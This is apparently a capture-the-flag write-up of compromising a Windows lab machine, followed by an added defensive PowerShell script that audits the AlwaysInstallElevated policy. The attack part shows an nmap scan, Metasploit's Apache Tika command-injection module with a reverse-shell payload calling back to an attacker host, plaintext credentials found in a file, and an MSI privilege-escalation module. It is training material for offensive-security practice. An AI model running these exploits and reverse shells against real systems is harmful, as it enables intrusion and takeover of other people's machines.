CiberLente (msfconsole)

PORT      STATE    SERVICE        VERSION
80/tcp    open     http           Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
3389/tcp  open     ms-wbt-server  Microsoft Terminal Services
|_ssl-date: 2025-01-13T23:58:29+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2025-01-12T23:55:48
|_Not valid after:  2025-07-14T23:55:48
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2025-01-13T23:58:18+00:00
3885/tcp  filtered topflow-ssl
5985/tcp  open     http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open     pando-pub?
10051/tcp filtered zabbix-trapper
13293/tcp filtered unknown
16781/tcp filtered unknown
23181/tcp filtered unknown
30693/tcp filtered unknown
37566/tcp filtered unknown
41450/tcp filtered unknown
46886/tcp filtered unknown
47001/tcp open     http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47451/tcp filtered unknown
49664/tcp open     msrpc          Microsoft Windows RPC
49665/tcp open     msrpc          Microsoft Windows RPC
49666/tcp open     msrpc          Microsoft Windows RPC
49667/tcp open     msrpc          Microsoft Windows RPC
49668/tcp open     msrpc          Microsoft Windows RPC
49670/tcp open     msrpc          Microsoft Windows RPC
49671/tcp open     msrpc          Microsoft Windows RPC
49677/tcp open     msrpc          Microsoft Windows RPC
52425/tcp filtered unknown
55206/tcp filtered unknown
55326/tcp filtered unknown
61777/tcp open     http           Jetty 8.y.z-SNAPSHOT
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/plain).
|_http-cors: HEAD GET
61912/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-13T23:58:21
|_  start_date: N/A

We go to the HTTP service on port 61777.

We look for an exploit.

                                                                                                        
┌──(docker㉿docker)-[~/try]
└─$ searchsploit tika   
---------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ---------------------------------
Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)       | windows/remote/47208.rb
Apache Tika-server < 1.18 - Command Injection                         | windows/remote/46540.py
Joomla! Component com_cartikads 1.0 - Arbitrary File Upload           | php/webapps/10984.txt
Mitra Informatika Solusindo cart - SQL Injection                      | php/webapps/5214.txt
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                        
┌──(docker㉿docker)-[~/try]
└─$ searchsploit -m windows/remote/47208.rb
  Exploit: Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)
      URL: https://www.exploit-db.com/exploits/47208
     Path: /usr/share/exploitdb/exploits/windows/remote/47208.rb
    Codes: CVE-2018-1335
 Verified: True
File Type: Ruby script, ASCII text
Copied to: /home/docker/try/47208.rb


                                                                                                        
┌──(docker㉿docker)-[~/try]
└─$ ls
47208.rb  LasMarco.ovpn  gobuster.out  nmap-trickster.txt
┌──(docker㉿docker)-[~/try]
└─$ msfconsole 
Metasploit tip: Use the resource command to run commands from a file
                                                  

      .:okOOOkdc'           'cdkOOOko:.                                                                 
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                                               
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                                              
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'                                                             
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo                                                             
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx                                                             
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl                                                             
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.                                                             
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc                                                              
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo                                                               
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl                                                                
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;                                                                 
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.                                                                  
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,                                                                    
           :kk;.OOOOOOOOOOOOO.;Ok:                                                                      
             ;kOOOOOOOOOOOOOOOk:                                                                        
               ,xOOOOOOOOOOOx,                                                                          
                 .lOOOOOOOl.                                                                            
                    ,dOd,                                                                               
                      .                                                                                 

       =[ metasploit v6.4.38-dev                          ]
+ -- --=[ 2466 exploits - 1273 auxiliary - 393 post       ]
+ -- --=[ 1475 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search tika

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript         2018-04-25       excellent  Yes    Apache Tika Header Command Injection                                                                              
   1  post/linux/gather/puppet                             .                normal     No     Puppet Config Gather
   2  auxiliary/scanner/http/wp_gimedia_library_file_read  .                normal     No     WordPress GI-Media Library Plugin Directory Traversal Vulnerability


Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/http/wp_gimedia_library_file_read                                                                                   

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/apache_tika_jp2_jscript) > show options

We configure the LHOST, RHOSTS and RPORT options.


msf6 exploit(windows/http/apache_tika_jp2_jscript) > set LHOST 10.9.3.32
LHOST => 10.9.3.32
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RPORT 61777
RPORT => 61777
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RHOSTS cyberlens.thm
RHOSTS => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > run

meterpreter > shell
Process 4696 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

C:\Windows\system32>cd C:\Users\cyberlens\Desktop
cd C:\Users\cyberlens\Desktop

type user.txt
THM{T1k4-CV3-f0r-7h3-w1n}
C:\Users\CyberLens\Desktop>

Escalation

Using tree /f, we enumerate the user's file system and find their credentials under C:\Users\CyberLens.

The tree /f command lists the files in that directory.

C:\Users\CyberLens\Desktop> tree /f

tree /f
Folder PATH listing
Volume serial number is A8A4-C362
C:.
    EC2 Feedback.website
    EC2 Microsoft Windows Guide.website
    user.txt
    
No subfolders exist 


C:\Users\CyberLens\Desktop>cd..    
cd..

C:\Users\CyberLens>tree /f
tree /f
Folder PATH listing
Volume serial number is A8A4-C362
C:.
├───3D Objects
├───Contacts
├───Desktop
│       EC2 Feedback.website
│       EC2 Microsoft Windows Guide.website
│       user.txt
│
├───Documents
│   └───Management
│           CyberLens-Management.txt
│
├───Downloads
├───Favorites
│   │   Bing.url
│   │
│   └───Links
├───Links
│       Desktop.lnk
│       Downloads.lnk
│
├───Music
├───Pictures
├───Saved Games
├───Searches
└───Videos

The following file was found: CyberLens-Management.txt
C:\Users\CyberLens>type Documents\Management\Cyberlens-Management.txt
type Documents\Management\Cyberlens-Management.txt
Remember, manual enumeration is often key in an engagement ;)

CyberLens
HackSmarter123
C:\Users\CyberLens>

Now the escalation:

msf6 exploit(windows/local/always_install_elevated) > show options

Module options (exploit/windows/local/always_install_elevated):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.42     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows
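The always_install_elevated module only works because of a Windows Installer policy: when the REG_DWORD value AlwaysInstallElevated is set to 1 under both the HKLM and HKCU policy keys, any MSI package is installed with SYSTEM privileges, which is why a low-privileged meterpreter session can be turned into a SYSTEM one. The PowerShell script below is an added example for auditing and closing that misconfiguration; it is not part of the write-up or of the Metasploit module. The `-Remediate` switch and the `Get-AlwaysInstallElevatedState` function are names chosen here, not an existing tool.

```powershell
# Added example (not from the write-up): audit the AlwaysInstallElevated policy
# that exploit/windows/local/always_install_elevated relies on. The Windows
# Installer runs an MSI as SYSTEM only when BOTH of these REG_DWORD values are 1;
# the script reports each hive and the combined state, and optionally resets them.
param(
    [switch]$Remediate   # hypothetical switch: set both values to 0 when present
)

$ValueName = 'AlwaysInstallElevated'
$Keys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # Returns one object per hive with the current value ($null when the key or value is absent).
    foreach ($key in $Keys) {
        $value = $null
        if (Test-Path -Path $key) {
            $value = (Get-ItemProperty -Path $key -Name $ValueName -ErrorAction SilentlyContinue).$ValueName
        }
        [pscustomobject]@{
            Key     = $key
            Value   = $value
            Enabled = ($value -eq 1)
        }
    }
}

$state = Get-AlwaysInstallElevatedState
$state | Format-Table -AutoSize

# The escalation path exists only when both hives say 1.
$exposed = ($state | Where-Object { $_.Enabled }).Count -eq $Keys.Count
if ($exposed) {
    Write-Warning "AlwaysInstallElevated is 1 in both HKLM and HKCU: any user can install an MSI as SYSTEM."
} else {
    Write-Host "AlwaysInstallElevated is not fully enabled; the MSI escalation path is closed." -ForegroundColor Green
}

if ($Remediate -and $exposed) {
    foreach ($key in $Keys) {
        # Writing 0 instead of deleting the value keeps the policy explicit and visible to auditors.
        Set-ItemProperty -Path $key -Name $ValueName -Value 0 -Type DWord
    }
    Write-Host "Both values reset to 0. Confirm with: reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v $ValueName"
}
```

Run it as an administrator to see both hives; note that the HKCU half reflects the user running the script, so on a shared host the check should be repeated as (or against the loaded hive of) each interactive user. In a domain the authoritative fix is to disable "Always install with elevated privileges" in both the Computer and User Configuration parts of the relevant GPO, otherwise the local registry change is overwritten at the next policy refresh.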
